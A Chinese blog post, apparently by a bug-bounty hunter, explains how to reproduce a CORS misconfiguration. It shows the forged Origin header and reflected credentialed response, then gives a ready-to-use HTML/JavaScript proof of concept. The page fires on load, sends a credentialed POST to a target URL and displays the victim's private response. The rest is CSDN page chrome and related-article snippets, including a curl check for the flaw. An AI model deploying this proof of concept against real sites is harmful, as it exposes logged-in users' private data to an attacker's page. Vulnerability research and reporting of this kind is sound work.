CORS跨域访问

最新推荐文章于 2024-04-17 09:52:03 发布
最新推荐文章于 2024-04-17 09:52:03 发布
阅读量725 收藏 1
点赞数
分类专栏: 渗透测试总结的方法 文章标签: CORS跨域访问 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Bul1et/article/details/84847804
版权

这个漏洞是在挖漏洞的时候遇到的,大佬给我说这个漏洞厂商收。所以就来总结一波

我就来说说复现的姿势吧

找到存在漏洞的url

我们来看正常的回显

现在来改他的请求包   在请求包里面增加payload  看看回显

Access-Control-Allow-Origin: http://svdXXfL0.com

Access-Control-Allow-Credentials: true

现在即可证明存在此漏洞   但是我们要来构造一个POC  像点击劫持那样去访问自己构造的.html文件  我们的目的就是截取图中回显的马赛克里面的内容

现在构造POC  只需修改里面的漏洞url就行了

<!DOCTYPE html><html><head>    <title>CORS</title></head><body onload = "getData()"> </body></html><script type="text/javascript">    function getData(){    var xmlhttp;    if (window.xmlHttpRequest)      {      xmlhttp=new xmlHttpRequest();      }    else      {      xmlhttp=new ActiveXobject("Microsoft.xmlHTTP");      }    xmlhttp.onreadystatechange=function()      {      if (xmlhttp.readyState==4 && xmlhttp.status==200)        {            data=xmlhttp.responseText;            document.write(data);        }          }    xmlhttp.open("POST","漏洞url",true);    xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");     xmlhttp.send("funcNo=1000320&group_id=1&add_id=");}</script>

改后缀为html文件  访问之后

 

 

冲冲_冲
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一次CORS漏洞的手工验证
路漫漫其修远
01-05 5007
给项目接口做安全扫描的时候,发现有个CORS漏洞: 但仅仅扫出来还不够,需要手工验证一下 手工验证方式 在正常的api请求处,headers加入"origin":"http://xx.xx.xx.xx", 如果接口正常返回了数据且headers里包含 access-control-allow-credentials : true access-control-allow-origin : http://xx.xx.xx.xx 就说明这个接口确实存在CORS漏洞 poc代码 <html> &
CORS跨域
weixin_46078854的博客
11-12 1523
一、修改代码: 1.简单请求 //go后端(w为http.ResponseWriter): w.Header().Set("Access-Control-Allow-Origin", “*”); 2.非简单请求(预检) //go后端(w为http.ResponseWriter): // 如果需要http请求中带上cookie,需要前后端都设置credentials,且后端设置指定的origin,即域名不能为"*" w.Header().Set("A......
CORS-POC-Generator:Web脚本,使用HTML CSS和JS生成CORS漏洞的POC
04-07
CORS-POC生成器 Web脚本使用HTML CSS和JS生成CORS漏洞的POC。 输入URL,如果您看到带有JSON数据的警报,则单击“生成”,然后利用它的可利用性,否则找到另一个端点。 安装 克隆回购文件并运行索引文件吧! 或实时生成: :
CORS漏洞利用检测和利用方式
凝聚力安全团队
09-01 4686
CORS漏洞利用检测和利用方式 CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求。 检测方式: 1.curl访问网站 curl https://www.junsec.com -H "Origin: https://test.com" -I 检查返回包的 Access-Control-Allow-Origin 字段是否为https://test.com 2.burpsuite发送请求包,
漏洞分析 | CORS讲解与实战利用
最新发布
zkaqlaoniao的博客
04-17 1356
CORS跨域资源共享(Cross-origin resource sharing),这种机制通过添加HTTP字段的方式规定服务器资源允许被哪些域访问(Access-Control-Allow-Origin)、请求中是否允许发送cookie(Access-Control-Allow-Credentials)、哪些请求类型是被允许的(Access-Control-Request-Method)等等。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
CORS跨域漏洞简析
Alexz__的博客
04-18 2055
1,什么是CORS 2,CORS漏洞简析及POC 3,基于wordpress5.2.4的CORS漏洞复现 壹 什么是CORS 想了解CORS先要搞清楚浏览器的同源策略 同源策略(Same Origin Policy) 是一个重要的安全策略,它用于限制一个origin的文档或者它加载的脚本如何能与另一个源的资源进行交互。它能帮助阻隔恶意文档,减少可能被攻击的...
CORS跨域资源共享漏洞
Sentiment的博客
07-25 720
CORS跨域资源共享)是一种用于在Web浏览器中处理跨域请求的机制。当在浏览器上执行JavaScript代码时,由于同源策略的限制,脚本只能与同源(相同协议、域名和端口)的服务器进行通信。但在某些情况下,我们可能需要从一个域向另一个域请求数据或资源,这就涉及到跨域请求。
CORS跨域配置
qq_44954984的博客
04-26 301
webconfig中: <system.webServer> <ctpProtocol> </system.webServer> 另外,对于复杂请求(非GET请求),需要在WebApi中添加,无参无返的 Options 方法public void Options(){} //这是预请求 Globa...
CORS跨域访问框架jra包
11-15
`CORS跨域访问框架jra包`则提供了一种方便的方式来实现CORS支持,使得开发者可以轻松地在服务器端配置CORS策略。 `cors-filter-1.7.jar` 是这个框架的核心组件,它是一个基于Java的过滤器(Filter),可以集成到...
cors跨域问题对应的jar包.zip
08-19
"cors跨域问题对应的jar包.zip"这个压缩包文件包含了处理跨域问题所需的两个关键库:`cors-filter-1.7.jar`和`java-property-utils-1.9.1.jar`。`cors-filter`是一个实现了CORS规范的Java过滤器,它允许我们在Tomcat...
你可能不知道的CORS跨域资源共享
10-17
CORS跨域资源共享)是Web开发中解决跨域访问问题的一种机制,它允许浏览器在遵循同源策略的前提下,通过特定的HTTP头部与服务器通信,从而实现不同源之间的资源访问。这种机制是为了解决现代Web应用中由于同源策略...
cors跨域Tomcat文件
04-21
【标题】"cors跨域Tomcat文件"涉及的是在Web开发中解决跨域问题的一种常见方法,即使用CORS(Cross-Origin Resource Sharing)机制在Apache Tomcat服务器上配置和实现。CORS是一种允许浏览器安全地从不同源加载资源...
详解Spring MVC CORS 跨域
08-30
CORS 全称是跨域资源共享,它允许 Web 应用程序可以访问不同域名下的资源,而不受同源策略的限制。例如,一个域名为 http://example1.com 的 Web 应用程序想要访问另一个域名为 http://example2.com 的资源,这时就...
cors漏洞 复现_CORS的进阶利用
weixin_33454080的博客
02-06 1221
简介主要看了Corben Leo的Advanced CORS Exploitation Techniques这篇文章,对这篇文章的一个翻译吧,收获良多,复现一下cors漏洞的进阶利用。直入正题。 CORS介绍这里就借OWASP的关于CORS的介绍。CORS stands for Cross-Origin Resource Sharing.Is an feature offering the pos...
使用CORS解决跨域问题
weixin_34163553的博客
05-02 1192
1.跨域问题 1.1 什么是跨域 跨域是指跨域名的访问,以下情况都属于跨域跨域原因说明 示例 域名不同 www.jd.com 与 www.taobao.com 域名相同,端口不同 www.jd.com:8080 与 www.jd.com:8081 二级域名不同 item.jd.com 与 miaosha.jd.com 如果域名和端口都相同,但是请求路径不同,不属于跨...
Cors漏洞详解
Askshhbs的博客
04-26 9748
Cors介绍 Cors全称"跨域资源共享"(Cross-origin resource sharing),Cors的出现是用来弥补SOP(同源策略)的不足。在当时SOP有些限制了网页的业务需求,不能够使不同域的网页互相访问,因此提出了Cors:用于绕过SOP(同源策略)来实现跨域资源访问的一种技术。 Cors漏洞就是攻击者利用Cors技术来获取用户的敏感数据,从而导致用户敏感信息泄露。 漏洞原理 Cors请求可分为两类,简单请求和非简单请求。所谓简单请求,就是请求方式为GET,POST,HEAD这三
跨域问题详解:CORS问题+解决办法
热门推荐
weixin_45565886的博客
09-29 1万+
跨域问题详解:CORS问题+解决办法
掌握 CORS 跨域请求,读这篇文章就够了
360技术
11-22 2850
在 Web 前后端分离架构模式下,跨域(跨源)请求属于日常的基本情况了。浏览器出于安全考虑,会限制 JavaScript(简称 JS)脚本内发起跨源 HTTP 请求,同源没有此类限制。前端解决跨域方法有很多,比如WebSocket 协议跨域、JSONP 请求跨域跨域资源共享 CORS等。01CORS 简介CORS 全称为 Cross-Origin Resource Sharing,被译为跨域...
cors跨域漏洞概述
10-11
CORS(跨来源资源共享)是一个用于浏览器和服务器之间通信的机制,它允许服务器在响应中添加一些响应头来明确指示哪些域被允许访问该资源。由于同源策略的限制,浏览器通常不允许从一个源加载另一个源的资源,但如果...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值